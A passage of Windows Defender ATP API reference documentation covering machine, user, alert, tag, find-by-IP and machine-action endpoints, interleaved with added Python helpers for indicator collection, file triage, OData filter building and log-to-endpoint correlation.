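    {"sha1": "a" * 40, "sha256": "a" * 64, "md5": "a" * 32, "globalPrevalence": 2,
     "windowsDefenderAVThreatName": "Example.TestThreat", "signer": None,
     "isValidCertificate": False},  # constructed placeholder values
]}


def collect_indicators(domains_resp, ips_resp, files_resp):
    """Pull de-duplicated, validated indicators out of the three related-entity responses."""
    domains = {d["host"].lower() for d in domains_resp.get("value", []) if d.get("host")}
    ips = set()
    for entry in ips_resp.get("value", []):
        try:
            ips.add(str(ipaddress.ip_address(entry["id"])))  # normalises and rejects junk
        except (KeyError, ValueError):
            continue  # never let a malformed entry into a blocklist
    files = files_resp.get("value", [])
    hashes = {algo: sorted({f[algo] for f in files if f.get(algo)})
              for algo in ("sha1", "sha256", "md5")}
    return {"domains": sorted(domains), "ips": sorted(ips), **hashes}


def triage_file(entry, prevalence_threshold=100):
    """Return the reasons a related file deserves analyst attention (empty list = nothing notable).

    The signals are the ones the file entity exposes: an AV threat name, a missing or
    invalid signature, and low global prevalence (the threshold is an assumption).
    """
    reasons = []
    threat = entry.get("windowsDefenderAVThreatName")
    if threat:
        reasons.append(f"av-detection:{threat}")
    if not entry.get("isValidCertificate"):
        reasons.append("unsigned-or-invalid-signature")
    prevalence = entry.get("globalPrevalence")
    if prevalence is not None and prevalence < prevalence_threshold:
        reasons.append(f"low-prevalence:{prevalence}")
    return reasons


if __name__ == "__main__":
    print(collect_indicators(DOMAINS_RESP, IPS_RESP, FILES_RESP))
    for f in FILES_RESP["value"]:
        print(f["sha256"][:12], triage_file(f))
```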
Get alert related machine information API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves the machine that is related to a specific alert.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Read.All 'Read all machine information'

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.Read 'Read machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/alerts/{id}/machine

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the alert and machine exist - 200 OK. If the alert or the machine is not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/machine

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines/$entity",
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
Get alert related user information API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves the user associated with a specific alert.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application User.Read.All 'Read user profiles'

Delegated (work or school account) User.Read.All 'Read user profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine associated with the alert, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/alerts/{id}/user

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the alert and a user exist - 200 OK with the user in the body. If the alert or the user is not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/alerts/636688558380765161_2136280442/user

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Users/$entity",
"id": "contoso\\user1",
"firstSeen": "2018-08-02T00:00:00Z",
"lastSeen": "2018-08-04T00:00:00Z",
"mostPrevalentMachineId": null,
"leastPrevalentMachineId": null,
"logonTypes": "Network",
"logOnMachinesCount": 3,
"isDomainAdmin": false,
"isOnlyNetworkUser": null
}
Machine resource type
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Methods
METHOD RETURN TYPE DESCRIPTION

List machines machine collection List the set of machine entities in the org.

Get machine machine Get a machine by its identity.

Get logged on users user collection Get the set of users that logged on to the machine.

Get related alerts alert collection Get the set of alert entities that were raised on the machine.

Add or Remove machine tags machine Add or remove a tag on a specific machine.

Find machines by IP machine collection Find machines seen with an IP.

Properties
PROPERTY TYPE DESCRIPTION

id String Machine identity.

computerDnsName String Machine fully qualified name.

firstSeen DateTimeOffset First date and time when the machine was observed by Windows Defender ATP.

lastSeen DateTimeOffset Last date and time when the machine was observed by Windows Defender ATP.

osPlatform String OS platform.

osVersion String OS version.

lastIpAddress String Last IP on the local NIC of the machine.

lastExternalIpAddress String Last IP through which the machine accessed the internet.

agentVersion String Version of the Windows Defender ATP agent.

osBuild Nullable long OS build number.

healthStatus Enum Machine health status. Possible values are: "Active", "Inactive", "ImpairedCommunication", "NoSensorData" and "NoSensorDataImpairedCommunication".

rbacGroupId Int RBAC group ID.

rbacGroupName String RBAC group name.

riskScore Nullable Enum Risk score as evaluated by Windows Defender ATP. Possible values are: 'None', 'Low', 'Medium' and 'High'.

aadDeviceId Nullable Guid AAD device ID (when the machine is AAD joined).

machineTags String collection Set of machine tags.


List machines API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
This API can do the following actions:
Retrieves a collection of machines that have communicated with the Windows Defender ATP cloud in the last 30 days.
The Get Machines collection API supports OData V4 queries.
The OData $filter query is supported on: "Id", "ComputerDnsName", "LastSeen", "LastIpAddress", "HealthStatus", "OsPlatform", "RiskScore", "MachineTags" and "RbacGroupId".
See examples at OData queries with Windows Defender ATP

Permissions
PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Read.All 'Read all machine profiles'

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.Read 'Read machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The response will include only machines that the user has access to, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET https://api.securitycenter.windows.com/api/machines

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.


Request body
Empty

Response
If successful and machines exist - 200 OK with the list of machine entities in the body. If there are no recent machines - 404 Not
Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/machines

Response
Here is an example of the response.
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"isAadJoined": true,
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
},
{
"id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7",
"computerDnsName": "mymachine2.contoso.com",
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"lastExternalIpAddress": "79.183.65.82",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"healthStatus": "Inactive",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"isAadJoined": false,
"aadDeviceId": null,
"machineTags": [ "test tag 1" ]
}
]
}

Related topics
OData queries with Windows Defender ATP
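The list API is most useful with the OData $filter described above, and the returned list is where sensor-coverage gaps show up (a machine that is Inactive or has gone quiet is a machine that is no longer reporting telemetry). As an added example that is not code from the page or from Microsoft's SDK, this Python builds a $filter restricted to the documented filterable properties and triages the sample response; the camelCase spelling of the filter fields, the function names, the sample dictionary and the seven-day staleness threshold are assumptions.

```python
from datetime import datetime, timedelta, timezone
from urllib.parse import quote

# Properties the page lists as filterable, written in the camelCase form the machine entity
# uses in its JSON (the page capitalises them; the camelCase spelling is an assumption).
FILTERABLE = {"id", "computerDnsName", "lastSeen", "lastIpAddress", "healthStatus",
              "osPlatform", "riskScore", "machineTags", "rbacGroupId"}
OPERATORS = {"eq", "ne", "gt", "ge", "lt", "le"}


def parse_timestamp(ts):
    """Parse the API's UTC timestamps (trailing Z, up to 7 fractional digits) on any Python 3."""
    base, _, frac = ts.rstrip("Z").partition(".")
    dt = datetime.strptime(base, "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
    return dt.replace(microsecond=int((frac + "000000")[:6])) if frac else dt


def odata_literal(value):
    """Render a Python value as an OData literal (strings quoted, datetimes unquoted UTC)."""
    if isinstance(value, bool):
        return "true" if value else "false"
    if isinstance(value, int):
        return str(value)
    if isinstance(value, datetime):
        return value.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return "'" + str(value).replace("'", "''") + "'"  # OData escapes a quote by doubling it


def machines_filter(conditions):
    """Join (field, operator, value) triples with 'and', rejecting fields the API cannot filter."""
    parts = []
    for field, op, value in conditions:
        if field not in FILTERABLE:
            raise ValueError(f"{field} is not filterable on /api/machines")
        if op not in OPERATORS:
            raise ValueError(f"unsupported operator {op}")
        if field == "lastSeen" and isinstance(value, str):
            value = parse_timestamp(value)  # datetime literals must not be quoted
        parts.append(f"{field} {op} {odata_literal(value)}")
    return " and ".join(parts)


def machines_url(conditions, host="api.securitycenter.windows.com"):
    """Full GET URL; spaces are percent-encoded because urllib rejects them in a URL."""
    expr = machines_filter(conditions)
    if not expr:
        return f"https://{host}/api/machines"
    encoded = quote(expr, safe="=:,'")
    return f"https://{host}/api/machines?$filter={encoded}"


# Constructed sample: the two machines from the response above, reduced to the fields used here.
SAMPLE_MACHINES = {"value": [
    {"computerDnsName": "mymachine1.contoso.com", "lastSeen": "2018-08-02T14:55:03.7791856Z",
     "healthStatus": "Active", "riskScore": "Low"},
    {"computerDnsName": "mymachine2.contoso.com", "lastSeen": "2018-07-09T13:22:45.1250071Z",
     "healthStatus": "Inactive", "riskScore": "Low"},
]}


def stale_machines(resp, now, max_age_days=7):
    """List (computerDnsName, reasons) for machines that are not healthy or have gone quiet.

    `now` may be a UTC datetime or an API-style timestamp string. lastSeen is checked in
    addition to healthStatus so a sensor that silently stopped reporting is still surfaced.
    """
    now = parse_timestamp(now) if isinstance(now, str) else now
    cutoff = now - timedelta(days=max_age_days)
    flagged = []
    for m in resp.get("value", []):
        reasons = []
        if m.get("healthStatus") != "Active":
            reasons.append(f"healthStatus={m.get('healthStatus')}")
        if parse_timestamp(m["lastSeen"]) < cutoff:
            reasons.append(f"lastSeen older than {max_age_days} days")
        if reasons:
            flagged.append((m["computerDnsName"], reasons))
    return flagged


if __name__ == "__main__":
    print(machines_url([("healthStatus", "eq", "Active"), ("riskScore", "eq", "High")]))
    print(stale_machines(SAMPLE_MACHINES, "2018-08-03T00:00:00Z"))
```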
Get machine by ID API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a machine entity by ID.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Read.All 'Read all machine profiles'

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.Read 'Read machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups for
more information)

HTTP request
GET /api/machines/{id}

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the machine exists - 200 OK with the machine entity in the body. If a machine with the specified id was
not found - 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machine",
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
Get machine log on users API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves the collection of users that logged on to the machine.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application User.Read.All 'Read user profiles'

Delegated (work or school account) User.Read.All 'Read user profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The response will include users only if the machine is visible to the user, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/machines/{id}/logonusers

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the machine exists - 200 OK with the list of user entities in the body. If the machine was not found - 404 Not
Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/logonusers

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Users",
"value": [
{
"id": "contoso\\user1",
"firstSeen": "2018-08-02T00:00:00Z",
"lastSeen": "2018-08-04T00:00:00Z",
"mostPrevalentMachineId": null,
"leastPrevalentMachineId": null,
"logonTypes": "Network",
"logOnMachinesCount": 3,
"isDomainAdmin": false,
"isOnlyNetworkUser": null
},
{
"id": "contoso\\user2",
"firstSeen": "2018-08-02T00:00:00Z",
"lastSeen": "2018-08-05T00:00:00Z",
"mostPrevalentMachineId": null,
"leastPrevalentMachineId": null,
"logonTypes": "Network",
"logOnMachinesCount": 3,
"isDomainAdmin": false,
"isOnlyNetworkUser": null
}
]
}
Get machine related alerts API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of alerts related to a given machine ID.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Alert.Read.All 'Read all alerts'

Application Alert.ReadWrite.All 'Read and write all alerts'

Delegated (work or school account) Alert.Read 'Read alerts'

Delegated (work or school account) Alert.ReadWrite 'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups for
more information)

HTTP request
GET /api/machines/{id}/alerts

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and the machine exists - 200 OK with the list of alert entities in the body. If the machine was not found - 404 Not
Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/alerts

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"assignedTo": "secop@contoso.com",
"severity": "Low",
"status": "InProgress",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-25T16:19:21.8409809Z",
"firstEventTime": "2018-11-25T16:17:50.0948658Z",
"lastEventTime": "2018-11-25T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
]
}
Add or Remove Machine Tags API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
This API adds or removes a tag on a specific machine.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'Manage security setting' (See Create and manage roles for
more information)
The user needs to have access to the machine, based on machine group settings (See Create and manage machine groups for
more information)

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/tags

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Content-Type string application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER TYPE DESCRIPTION

Value String The tag name. Required.

Action Enum Add or Remove. Allowed values are: 'Add' or 'Remove'. Required.

Response
If successful, this method returns a 200 OK response code and the updated machine in the response body.

Example
Request
Here is an example of a request that adds a machine tag.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

POST https://api.securitycenter.windows.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/tags
Content-type: application/json
{
"Value" : "test Tag 2",
"Action": "Add"
}

Response
Here is an example of the response.

HTTP/1.1 200 Ok
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machine/$entity",
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
To remove a machine tag, set the Action to 'Remove' instead of 'Add' in the request body.
Find machines by internal IP API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Find machines seen with the requested internal IP in the time range of 15 minutes before and after a given
timestamp.
The given timestamp must be in the past 30 days.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Read.All 'Read all machine profiles'

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.Read 'Read machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)
The response will include only machines that the user has access to, based on machine group settings (See Create and
manage machine groups for more information)

HTTP request
GET /api/machines/findbyip(ip='{IP}',timestamp={TimeStamp})

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful and machines were found - 200 OK with the list of the machines in the response body. If no machine was
found - 404 Not Found. If the timestamp is not in the past 30 days - 400 Bad Request.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, you can use a server closer to your geo location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/machines/findbyip(ip='10.248.240.38',timestamp=2018-09-22T08:44:05Z)

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-09-22T08:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "10.248.240.38",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
}
]
}
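A common use of findbyip is correlating an internal address from a firewall or proxy log with the endpoint that held it at that moment, which is why the API matches a 15-minute window around the timestamp (DHCP leases move) and refuses timestamps older than 30 days with a 400. As an added example that is not code from the page or from Microsoft's SDK, this Python turns constructed log lines into findbyip URLs and reports, rather than silently drops, the lines the service would reject; the log format, the function names and the sample lines are assumptions.

```python
import ipaddress
from datetime import datetime, timedelta, timezone

MAX_AGE = timedelta(days=30)    # the API answers 400 Bad Request for older timestamps
WINDOW = timedelta(minutes=15)  # the API matches sightings 15 minutes either side of the timestamp


def parse_utc(ts):
    """Parse a second-precision UTC timestamp such as 2018-09-22T08:44:05Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_by_ip_url(ip, timestamp, now, host="api.securitycenter.windows.com"):
    """Build GET /api/machines/findbyip(ip='{IP}',timestamp={TimeStamp}) after local validation.

    The checks mirror what the service rejects: a malformed address (ValueError from
    ipaddress) and a timestamp in the future or more than 30 days old.
    """
    addr = ipaddress.ip_address(ip)
    if timestamp > now or now - timestamp > MAX_AGE:
        raise ValueError("timestamp must be within the past 30 days")
    stamp = timestamp.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"https://{host}/api/machines/findbyip(ip='{addr}',timestamp={stamp})"


# Constructed firewall-style log lines: "<utc time> <source ip> -> <dest>:<port> <verdict>".
# The first uses the page's example address and time; the second is too old; the third is malformed.
SAMPLE_LOG = [
    "2018-09-22T08:44:05Z 10.248.240.38 -> 203.0.113.9:443 ALLOW",
    "2018-08-15T12:00:00Z 10.248.240.77 -> 203.0.113.9:443 ALLOW",
    "2018-09-30T01:02:03Z 10.248.240 -> 198.51.100.5:80 DENY",
]


def build_queries(log_lines, now_iso):
    """Turn the (timestamp, internal IP) pair of each log line into a findbyip URL.

    Returns one (line, url, reason) tuple per line; url is None when the line cannot be
    queried and reason says why, so the analyst sees the gap instead of an empty result.
    """
    now = parse_utc(now_iso)
    results = []
    for line in log_lines:
        fields = line.split()
        try:
            ts = parse_utc(fields[0])
            url = find_by_ip_url(fields[1], ts, now)
            results.append((line, url, None))
        except ValueError as exc:
            results.append((line, None, str(exc)))
        except IndexError:
            results.append((line, None, "malformed line"))
    return results


if __name__ == "__main__":
    for line, url, reason in build_queries(SAMPLE_LOG, "2018-10-01T00:00:00Z"):
        print(url or f"SKIPPED ({reason})", "<-", line)
```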
MachineAction resource type
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Methods
METHOD RETURN TYPE DESCRIPTION

List MachineActions Machine Action List Machine Action entities.

Get MachineAction Machine Action Get a single Machine Action entity.

Collect investigation package Machine Action Collect an investigation package from a machine.

Get investigation package SAS URI Machine Action Get a URI for downloading the investigation package.

Isolate machine Machine Action Isolate a machine from the network.

Release machine from isolation Machine Action Release a machine from isolation.

Restrict app execution Machine Action Restrict application execution.

Remove app restriction Machine Action Remove the application execution restriction.

Run antivirus scan Machine Action Run an AV scan using Windows Defender (when applicable).

Offboard machine Machine Action Offboard a machine from Windows Defender ATP.

Properties
PROPERTY | TYPE | DESCRIPTION
id | Guid | Identity of the Machine Action entity.
type | Enum | Type of the action. Possible values are: "RunAntiVirusScan", "Offboard", "CollectInvestigationPackage", "Isolate", "Unisolate", "StopAndQuarantineFile", "RestrictCodeExecution" and "UnrestrictCodeExecution".
requestor | String | Identity of the person that executed the action.
requestorComment | String | Comment that was written when issuing the action.
status | Enum | Current status of the command. Possible values are: "Pending", "InProgress", "Succeeded", "Failed", "TimeOut" and "Cancelled".
machineId | String | Id of the machine on which the action was executed.
creationDateTimeUtc | DateTimeOffset | The date and time when the action was created.
lastUpdateTimeUtc | DateTimeOffset | The last date and time when the action status was updated.
relatedFileInfo | Class | Contains two properties: 1) string 'fileIdentifier', 2) Enum 'fileIdentifierType' with the possible values: "Sha1", "Sha256" and "Md5".

List MachineActions API

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Gets a collection of actions performed on machines.
The Get MachineAction collection API supports OData V4 queries.
The OData $filter query is supported on: "Id", "Status", "MachineId", "Type", "Requestor" and
"CreationDateTimeUtc".
See examples at OData queries with Windows Defender ATP

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

PERMISSION TYPE PERMISSION PERMISSION DISPLAY NAME

Application Machine.Read.All 'Read all machine profiles'

Application Machine.ReadWrite.All 'Read and write all machine information'

Delegated (work or school account) Machine.Read 'Read machine information'

Delegated (work or school account) Machine.ReadWrite 'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)

HTTP request
GET https://api.securitycenter.windows.com/api/machineactions

Request headers
NAME TYPE DESCRIPTION

Authorization String Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with a collection of MachineAction entities.

Example 1
Request
Here is an example of the request on an organization that has three MachineActions.

GET https://api.securitycenter.windows.com/api/machineactions

Response
Here is an example of the response.
HTTP/1.1 200 Ok
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions",
"value": [
{
"id": "69dc3630-1ccc-4342-acf3-35286eec741d",
"type": "CollectInvestigationPackage",
"requestor": "Analyst@contoso.com",
"requestorComment": "test",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:43:57.2011911Z",
"lastUpdateTimeUtc": "2018-12-04T12:45:25.4049122Z",
"relatedFileInfo": null
},
{
"id": "2e9da30d-27f6-4208-81f2-9cd3d67893ba",
"type": "RunAntiVirusScan",
"requestor": "Analyst@contoso.com",
"requestorComment": "Check machine for viruses due to alert 3212",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:18:27.1293487Z",
"lastUpdateTimeUtc": "2018-12-04T12:18:57.5511934Z",
"relatedFileInfo": null
},
{
"id": "44cffc15-0e3d-4cbf-96aa-bf76f9b27f5e",
"type": "StopAndQuarantineFile",
"requestor": "Analyst@contoso.com",
"requestorComment": "test",
"status": "Succeeded",
"machineId": "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f",
"creationDateTimeUtc": "2018-12-04T12:15:40.6052029Z",
"lastUpdateTimeUtc": "2018-12-04T12:16:14.2899973Z",
"relatedFileInfo": {
"fileIdentifier": "a0c659857ccbe457fdaf5fe21d54efdcbf6f6508",
